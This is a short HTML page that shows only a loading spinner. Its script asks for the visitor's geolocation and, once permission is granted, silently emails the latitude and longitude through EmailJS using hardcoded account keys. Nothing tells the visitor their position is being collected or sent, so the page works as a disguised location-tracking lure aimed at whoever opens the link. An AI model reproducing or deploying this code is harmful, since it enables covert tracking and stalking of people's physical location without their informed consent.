<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body{background-color: black;
        min-height: 100vh;
        }
        #spinner{
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    background-color: black;
}
.spinner-appear{
    width: 70px;
    height: 70px;
    border-radius: 50%;
    border: 4px solid #F2C343!important;
    border-top-color: #333 !important;
    animation: spin 1s infinite linear; 
    display: block;
    
  }
  
  @keyframes spin {
    0% {
      transform: rotate(0deg);
    }
    100% {
      transform: rotate(360deg);
    }
  }
    </style>
</head>
<body>
    <div id="spinner" ><div class="spinner-appear"></div></div>
    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script>
        function sendEmail(loc) {
    // Replace these values with your own
const service_id = 'service_8k2wsaf';
const template_id = 'template_wxlspqk';
const public_key = '-LMa6RybqWxaFObf2';
 
  
  // Prepare the email parameters
  const templateParams = {
    loc: loc,  
  }; 

  // Send the email
  emailjs.send(service_id, template_id, templateParams, public_key)
    .then(function(response) {
      console.log('Email sent successfully!', response.status, response.text); 
        
    }, function(error) {
      console.error('Error sending email:', error); 
    }) 
    } 


    if (navigator.geolocation) {
  navigator.geolocation.getCurrentPosition(function(position) {
    var latitude = position.coords.latitude;
    var longitude = position.coords.longitude;
    var location = 'Latitude: ' + latitude + ', Longitude: ' + longitude;
 
    sendEmail(location) ; 
  });
} else {
  console.log('Geolocation is not supported by this browser.');
}

    </script>
</body>
</html>